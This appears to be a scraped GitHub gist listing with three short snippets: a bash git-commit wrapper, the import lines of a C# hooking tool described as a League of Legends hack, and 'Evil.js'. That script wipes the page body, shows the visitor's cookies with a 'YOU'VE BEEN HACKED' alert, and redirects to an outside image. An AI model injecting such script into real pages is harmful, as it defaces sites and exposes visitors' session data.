Skip to content

Instantly share code, notes, and snippets.

View davidzech's full-sized avatar

David Zech davidzech

View GitHub Profile
@davidzech
davidzech / Evil.js
Last active August 29, 2015 14:01
Evil
$(document.body).remove();
alert("YOU'VE BEEN HACKED. YOUR COOKIES ARE " + document.cookie);
window.location = "http://chan.catiewayne.com/z/src/136702353353.jpg";
@davidzech
davidzech / InternalLoLTimers
Created April 23, 2014 02:36
Curses stuipd League of Legends hack
using Coherent.UI.Binding;
using Curse.Companion.Scripting;
using Curse.CurseClient.Shared;
using Curse.Logging;
using Curse.Tools.LoL;
using EasyHook;
using Newtonsoft.Json;
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
#!/bin/bash
# check for -f flag as first argument; if present, bypass all restrictions
if [[ "$1" == "-f" ]]; then
shift
git-commit $@
exit 0
fi
fail()